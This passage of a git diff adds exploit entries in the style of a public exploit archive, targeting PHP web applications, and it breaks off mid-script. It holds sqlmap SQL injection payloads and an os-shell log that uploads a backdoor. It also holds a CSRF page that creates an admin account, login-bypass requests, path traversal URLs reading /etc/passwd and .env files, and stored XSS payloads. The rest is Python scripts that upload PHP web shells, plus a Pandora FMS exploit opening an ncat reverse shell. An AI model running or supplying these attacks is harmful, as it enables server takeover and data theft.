+    Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 5 columns
+    Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
+
+Parameter: fromdate (POST)
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
+---
+
+
+
+================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
+
+---
+Parameter: emailid (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
+---
+---
+Parameter: adminname (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
+---
+---
+Parameter: mobilenumber (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/47847.txt b/exploits/php/webapps/47847.txt
new file mode 100644
index 000000000..23ba25eb4
--- /dev/null
+++ b/exploits/php/webapps/47847.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Complaint Management System 4.0 - 'cid' SQL injection
+# Google Dork: N/A
+# Date: 2020-01-03
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.0
+# Tested on: Windows 7
+# CVE : N/A
+
+Description:
+
+The Complaint Management System v4.0 application from PHPgurukul is vulnerable to
+blind SQL injection via the 'cid' parameter which is found on the complaint-details.php
+page.
+
+========== 1. SQLi ==========
+
+SQLMAP POC:
+
+GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
+sqlmap identified the following injection point(s) with a total of 1748 HTTP(s) requests:
+---
+Parameter: cid (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: cid=2'+(SELECT 0x7648556f WHERE 4476=4476 AND SLEEP(5))+'
+---
+
+The ?cid parameter is vulnerable to sql injection within the
+
+the vulnerable URL = https://10.0.0.214/complaint%20management%20system/cms/admin/complaint-details.php?cid=2
+
+request:
+
+GET /complaint%20management%20system/cms/admin/complaint-details.php?cid=2 HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=5bmri9rlp1jvrjkhgumn7v9fot
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/php/webapps/47851.txt b/exploits/php/webapps/47851.txt
new file mode 100644
index 000000000..f92a9321b
--- /dev/null
+++ b/exploits/php/webapps/47851.txt
@@ -0,0 +1,138 @@
+# Exploit Title:  Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-01-05
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://intelliants.com/
+# Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5
+# Software : Subrion CMS
+# Product Version: v 4.0.5.10
+# Vulernability Type : Cross-Site Request Forgery (Add Admin)
+# Vulenrability : Cross-Site Request Forgery
+# CVE : N/A
+
+# Description :
+# CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS.
+# With this vulnerability, authorized users can be added to the system.
+
+HTML CSRF PoC :
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true);
+        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270");
+        xhr.withCredentials = true;
+        var body = "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"__st\"\r\n" +
+          "\r\n" +
+          "41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"username\"\r\n" +
+          "\r\n" +
+          "ismailtasdelen\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"fullname\"\r\n" +
+          "\r\n" +
+          "Ismail Tasdelen\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"email\"\r\n" +
+          "\r\n" +
+          "test@mail.com\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"_password\"\r\n" +
+          "\r\n" +
+          "Test1234!\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"_password2\"\r\n" +
+          "\r\n" +
+          "Test1234!\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
+          "\r\n" +
+          "1\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
+          "Content-Type: application/octet-stream\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"website\"\r\n" +
+          "\r\n" +
+          "https://ismailtasdelen.com\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"phone\"\r\n" +
+          "\r\n" +
+          "0000000000000000000\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"biography\"\r\n" +
+          "\r\n" +
+          "NULL\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"facebook\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"twitter\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"gplus\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"linkedin\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"sponsored\"\r\n" +
+          "\r\n" +
+          "0\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"plan_id\"\r\n" +
+          "\r\n" +
+          "2\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"sponsored_end\"\r\n" +
+          "\r\n" +
+          "2020-02-05 05:18:43\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"featured\"\r\n" +
+          "\r\n" +
+          "0\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"featured_end\"\r\n" +
+          "\r\n" +
+          "2020-02-05 05:19\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"status\"\r\n" +
+          "\r\n" +
+          "active\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"save\"\r\n" +
+          "\r\n" +
+          "Add\r\n" +
+          "-----------------------------9973334999367242361642875270\r\n" +
+          "Content-Disposition: form-data; name=\"goto\"\r\n" +
+          "\r\n" +
+          "list\r\n" +
+          "-----------------------------9973334999367242361642875270--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/47854.txt b/exploits/php/webapps/47854.txt
new file mode 100644
index 000000000..9e0da880b
--- /dev/null
+++ b/exploits/php/webapps/47854.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection
+# Google Dork: intitle: "Hostel management system"
+# Date: 2020-01-03
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/hostel-management-system/
+# Version: v2.0
+# Tested on: Windows
+# CVE : N/A
+
+Description:
+
+The Hostel Management System v2.0 application from PHPgurukul is vulnerable to
+SQL injection via the 'id' parameter on the full-profile.php page.
+
+==================== 1. SQLi ====================
+
+http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1
+
+THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
+user has the full ability to run system commands via --os-shell and fully compromise the system
+
+GET parameter 'id' is vulnerable.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: id=-3444' OR 1650=1650#
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind
+    Payload: id=1' OR SLEEP(5)-- slKU
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 29 columns
+    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+
+[14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php
+[14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php
+[14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
+os-shell> whoami
+do you want to retrieve the command standard output? [Y/n/a] y
+command standard output: 'john-pc\john'
+os-shell>
\ No newline at end of file
diff --git a/exploits/php/webapps/47858.txt b/exploits/php/webapps/47858.txt
new file mode 100644
index 000000000..d77166077
--- /dev/null
+++ b/exploits/php/webapps/47858.txt
@@ -0,0 +1,30 @@
+# Exploit Title: elaniin CMS 1.0 - Authentication Bypass
+# Author: riamloo
+# Date: 2020-01-02
+# Vendor Homepage: https://elaniin.com/ ( github ==> https://github.com/elaniin/ )
+# Software Link: https://github.com/elaniin/CMS/archive/master.zip
+# Version: 1
+# CVE: N/A
+# Tested on: Win 10
+
+# Discription:
+# Open-source Content Management System created with PHP + MySQL https://elaniin.com/
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/elaniin/login.php
+
+POST /elaniin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data;
+Content-Length: 334
+Referer: http://localhost/elaniin/login.php
+Cookie: PHPSESSID=81spdqht0gvh0f97vg62nzxs8
+Connection: close
+Upgrade-Insecure-Requests: 1
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
\ No newline at end of file
diff --git a/exploits/php/webapps/47874.txt b/exploits/php/webapps/47874.txt
new file mode 100644
index 000000000..ddebaebfd
--- /dev/null
+++ b/exploits/php/webapps/47874.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Small CRM 2.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-01-02
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/small-crm-php/
+# Version: V2.0
+# Tested on: Windows
+# CVE : N/A
+
+# Description:
+#
+# There is a SQL injection vulnerability in the /index.php page
+# which allows for an attacker to use the SQLi login bypass payload
+# '=''or' for both the username and password parameters, this allows
+# for any authenticated or low level user to login to the admin account.
+
+========== 1. Authentication bypass ==========
+
+POST /Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+Origin: http://10.0.0.214
+DNT: 1
+Connection: close
+Referer: http://10.0.0.214/Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php
+Cookie: PHPSESSID=k5845lo7s90it5p33js75665jq
+Upgrade-Insecure-Requests: 1
+
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&login=
\ No newline at end of file
diff --git a/exploits/php/webapps/47875.txt b/exploits/php/webapps/47875.txt
new file mode 100644
index 000000000..083fa87e9
--- /dev/null
+++ b/exploits/php/webapps/47875.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Voyager 1.3.0 - Directory Traversal
+# Google Dork: N/A
+# Date: January 2020-01-06
+# Exploit Author: NgoAnhDuc
+# Vendor Homepage: https://voyager.devdojo.com/
+# Software Link:https://github.com/the-control-group/voyager/releases/tag/v1.3.0https://github.com/the-control-group/voyager/releases/tag/v1.2.7
+# Version: 1.3.0 and bellow
+# Tested on: Ubuntu 18.04
+# CVE : N/A
+
+
+Vulnerable code is in voyager/src/Http/Controllers/VoyagerController.php
+
+========================================
+
+public function assets(Request $request)
+    {
+        *$path = str_start(str_replace(['../', './'], '',
+urldecode($request->path)), '/');*
+*        $path = base_path('vendor/tcg/voyager/publishable/assets'.$path);*
+        if (File::exists($path)) {
+            $mime = '';
+            if (ends_with($path, '.js')) {
+                $mime = 'text/javascript';
+            } elseif (ends_with($path, '.css')) {
+                $mime = 'text/css';
+            } else {
+                $mime = File::mimeType($path);
+            }
+            $response = response(File::get($path), 200,
+['Content-Type' => $mime]);
+            $response->setSharedMaxAge(31536000);
+            $response->setMaxAge(31536000);
+            $response->setExpires(new \DateTime('+1 year'));
+            return $response;
+        }
+        return response('', 404);
+    }
+========================================
+
+PoC:
+
+passwd:
+
+http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd
+
+
+Laravel environment
+file:http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F<web
+root dir>/.env
\ No newline at end of file
diff --git a/exploits/php/webapps/47876.txt b/exploits/php/webapps/47876.txt
new file mode 100644
index 000000000..c01fc4375
--- /dev/null
+++ b/exploits/php/webapps/47876.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Codoforum 4.8.3 - Persistent Cross-Site Scripting
+# Google Dork: intext:"Powered by Codoforum"
+# Date: 2020-01-03
+# Exploit Author: Prasanth c41m, Vyshnav Vizz
+# Vendor Homepage: https://codoforum.com/index.php
+# Software Link: https://codoforum.com/buy
+# Version: Codoforum 4.8.3 
+# Tested on: [relevant os]
+# CVE : [if applicable]
+# source: https://medium.com/@c41m/b2e1133c6a91?
+
+Codoforum is prone to a stored xss vulnerability.
+An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks.
+Codoforum version 4.8.3 is vulnerable. 
+
+1. Install Codoforum 4.8.3 in a local server.
+2. Goto http://localhost/index.php?u=/user/register
+3. Create a user using :- 
+			username : "><svg/onload=alert(1)>
+			password : password
+			email    : c41m@email.com
+4. Now goto http://localhost/admin/index.php?page=users/manage, an XSS alert popup will be triggered here.
\ No newline at end of file
diff --git a/exploits/php/webapps/47881.py b/exploits/php/webapps/47881.py
new file mode 100755
index 000000000..a35db8eff
--- /dev/null
+++ b/exploits/php/webapps/47881.py
@@ -0,0 +1,47 @@
+# Exploit Title: Job Portal 1.0 - Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-01-03
+# Exploit Author: Tib3rius
+# Vendor Homepage: https://phpgurukul.com/job-portal-project/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7855
+# Version: 1.0
+# Tested on: Ubuntu 16.04
+# CVE: N/A
+
+import argparse
+import random
+import requests
+import string
+import sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('url', action='store', help='The URL of the target.')
+args = parser.parse_args()
+
+url = args.url.rstrip('/')
+random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
+
+payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
+
+file = {'file': (random_file + '.php', payload, 'text/php')}
+print('> Attempting to upload PHP web shell...')
+r = requests.post(url + '/admin/gallery.php', files=file, data={'submit':'1'}, verify=False)
+print('> Verifying shell upload...')
+r = requests.get(url + '/admin/uploadimg/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
+
+if random_file in r.text:
+    print('> Web shell uploaded to ' + url + '/admin/uploadimg/' + random_file + '.php')
+    print('> Example command usage: ' + url + '/admin/uploadimg/' + random_file + '.php?cmd=whoami')
+    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
+    if launch_shell.lower() == 'y':
+        while True:
+            cmd = str(input('RCE $ '))
+            if cmd == 'exit':
+                sys.exit(0)
+            r = requests.get(url + '/admin/uploadimg/' + random_file + '.php', params={'cmd':cmd}, verify=False)
+            print(r.text)
+else:
+    if r.status_code == 200:
+        print('> Web shell uploaded to ' + url + '/admin/uploadimg/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
+    else:
+        print('> Web shell failed to upload! The web server may not have write permissions.')
\ No newline at end of file
diff --git a/exploits/php/webapps/47884.py b/exploits/php/webapps/47884.py
new file mode 100755
index 000000000..4af5294e9
--- /dev/null
+++ b/exploits/php/webapps/47884.py
@@ -0,0 +1,64 @@
+# Exploit Title: Complaint Management System 4.0 - Remote Code Execution
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.0
+# Category: Webapps
+# Tested on: Xampp for Windows
+# Description:
+# There isn't any file extension control at the "Register Complaint" section of user panel.
+# An unauthorized user can upload and execute php file.
+# Below basic python script will bypass authentication and execute command on target server.
+
+poc.py
+
+#!/usr/bin/python
+
+import requests
+import sys
+                  
+
+if len(sys.argv) !=3:
+	print "[*] Usage: PoC.py rhost/rpath command"
+	print "[*] e.g.: PoC.py 127.0.0.1/cms ipconfig"
+	exit(0) 
+
+rhost = sys.argv[1]
+command = sys.argv[2]
+
+#authentication bypass
+url = "http://"+rhost+"/users/index.php"
+data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}
+
+with requests.Session() as session:
+	
+	login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+
+	
+	#check authentication bypass
+	check = session.get("http://"+rhost+"/users/dashboard.php", allow_redirects=False)
+	print ("[*] Status code for login: %s"%check.status_code)
+	if check.status_code == 200:
+		print ("[+] Authentication bypass was successfull")
+	else:
+		print ("[-] Authentication bypass was unsuccessful")
+		sys.exit()
+	
+	#upload php file
+	ufile = {'compfile':('command.php', '<?php system($_GET["cmd"]); ?>')}
+	fdata = {"category": "1", "subcategory": "Online Shopping", "complaintype": " Complaint", "state": "Punjab", "noc": "the end", "complaindetails": "the end","compfile": "commmand.php", "submit": ""}
+	furl = "http://"+rhost+"/users/register-complaint.php"
+	fupload = session.post(url=furl, files= ufile, data=fdata)
+
+	#execution
+	final=session.get("http://"+rhost+"/users/complaintdocs/command.php?cmd="+command)
+
+	if final.status_code == 200:
+		print "[+] Command execution completed successfully.\n"
+		print "\tPut on a happy face.\n"
+	else:
+		print "[-] Command execution was unsuccessful."
+		print "\tOne bad day!"
+		sys.exit()
+
+	print final.text
\ No newline at end of file
diff --git a/exploits/php/webapps/47886.txt b/exploits/php/webapps/47886.txt
new file mode 100644
index 000000000..c1eea1030
--- /dev/null
+++ b/exploits/php/webapps/47886.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Codoforum 4.8.3 - Persistent Cross-Site Scripting
+# Google Dork: intext:"Powered by Codoforum"
+# Date: 2020-01-07
+# Exploit Author: Vyshnav Vizz
+# Vendor Homepage: https://codoforum.com/index.php
+# Software Link: https://codoforum.com/buy
+# Version: Codoforum 4.8.3 
+# Tested on: Linux
+# CVE : N/A
+
+Codoforum is prone to a Persistent Cross-site Scripting Vulnerability in User-Comment replay section
+An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks.
+
+Codoforum version 4.8.3 is vulnerable. 
+
+1. Install Codoforum 4.8.3 in a local server.
+2. Go to Start a new Topic >> Replay to any of the comment with XSS Payload
+3. Payload : "><svg/onload=alert(1)>
+4. Now  an XSS alert will be triggered here.
+
+POC:
+
+POST /forum/index.php?u=/Ajax/topic/reply HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 214
+Origin: http://susmost.com
+Connection: close
+Referer: http://localhost/forum/index.php?u=/topic/21/avg-antivirus-download-avg-antivirus-free-download-topbrandscompare
+Cookie: PHPSESSID=b5dccfcef3b5f4ce9571fbd3269d5b23; cf=0
+
+input_txt="><svg/onload=alert(1)>&output_txt=STARTCODOTAGp%3E%22%26gt%3B%26lt%3Bsvg%2Fonload%3Dalert(1)%26gt%3BSTARTCODOTAG%2Fp%3E%0A&tid=21&end_of_line=&token=35f5f85a86b15f475bbd9b79de313fa0&pid=false
\ No newline at end of file
diff --git a/exploits/php/webapps/47887.py b/exploits/php/webapps/47887.py
new file mode 100755
index 000000000..8d64710a2
--- /dev/null
+++ b/exploits/php/webapps/47887.py
@@ -0,0 +1,47 @@
+# Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-01-07
+# Exploit Author: Tib3rius
+# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
+# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
+# Version: 1.0
+# Tested on: Ubuntu 16.04
+# CVE: N/A
+
+import argparse
+import random
+import requests
+import string
+import sys
+
+parser = argparse.ArgumentParser()
+parser.add_argument('url', action='store', help='The URL of the target.')
+args = parser.parse_args()
+
+url = args.url.rstrip('/')
+random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
+
+payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
+
+file = {'image': (random_file + '.php', payload, 'text/php')}
+print('> Attempting to upload PHP web shell...')
+r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
+print('> Verifying shell upload...')
+r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
+
+if random_file in r.text:
+    print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
+    print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
+    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
+    if launch_shell.lower() == 'y':
+        while True:
+            cmd = str(input('RCE $ '))
+            if cmd == 'exit':
+                sys.exit(0)
+            r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
+            print(r.text)
+else:
+    if r.status_code == 200:
+        print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
+    else:
+        print('> Web shell failed to upload! The web server may not have write permissions.')
\ No newline at end of file
diff --git a/exploits/php/webapps/47898.py b/exploits/php/webapps/47898.py
new file mode 100755
index 000000000..4cd329aa0
--- /dev/null
+++ b/exploits/php/webapps/47898.py
@@ -0,0 +1,71 @@
+# Exploit Title: Pandora 7.0NG - Remote Code Execution
+# Date: 2019-11-14
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE: CVE-2019-20224
+# Vendor Homepage: https://pandorafms.org/
+# Software link: https://pandorafms.org/features/free-download-monitoring-software/
+# Version: v7.0NG
+# Tested on: CentOS 7.3 / PHP 5.4.16
+
+#!/usr/bin/python3
+
+import requests
+import sys
+
+if len(sys.argv) !=3D 6:
+    print("[+] Usage : ./exploit.py target username password ip port")
+    exit()
+
+target =3D sys.argv[1]
+username =3D sys.argv[2]
+password =3D sys.argv[3]
+ip =3D sys.argv[4]
+port =3D int(sys.argv[5])
+
+request =3D requests.session()
+
+login_info =3D {
+    "nick": username,
+    "pass": password,
+    "login_button": "Login"
+}
+
+login_request =3D request.post(
+    target+"/pandora_console/index.php?login=3D1",
+    login_info,
+    verify=3DFalse,
+    allow_redirects=3DTrue
+ )
+
+resp =3D login_request.text
+
+if "User not found in database" in resp:
+    print("[-] Login Failed")
+    exit()
+else:
+    print("[+] Logged In Successfully")
+
+print("[+] Sending crafted graph request ..")
+
+body_request =3D {
+    "date": "0",
+    "time": "0",
+    "period": "0",
+    "interval_length": "0",
+    "chart_type": "netflow_area",
+    "max_aggregates": "1",
+    "address_resolution": "0",
+    "name": "0",
+    "assign_group": "0",
+    "filter_type": "0",
+    "filter_id": "0",
+    "filter_selected": "0",
+    "ip_dst": "0",
+    "ip_src": '";ncat -e /bin/bash {0} {1} #'.format(ip, port),
+    "draw_button": "Draw"
+}
+
+draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati=
+on/netflow/nf_live_view&pure=3D0"
+print("[+] Check your netcat ;)")
+request.post(draw_url, body_request)
\ No newline at end of file
diff --git a/exploits/php/webapps/47899.py b/exploits/php/webapps/47899.py
new file mode 100755
index 000000000..d134556d8
--- /dev/null
+++ b/exploits/php/webapps/47899.py
@@ -0,0 +1,35 @@
+# Exploit Title: PixelStor 5000 - Remote Code Execution
+# Product: PixelStor 5000
+# Vendor: Rasilient
+# Date: 2020-01-08
+# Exploit Author: .:UND3R:.
+# Vendor Homepage: http://rasilient.com
+# Version: K:4.0.1580-20150629 (KDI Version)
+# Tested on: K:4.0.1580-20150629 (KDI Version)
+# CVE: CVE-2020-6756
+# URL Author: https://pwnedchile.com
+# Thanks: Dani Pelotocino <3, Roit
+
+import requests, sys
+
+def poc(target, cmd):
+	url = target + "/Option/languageOptions.php"
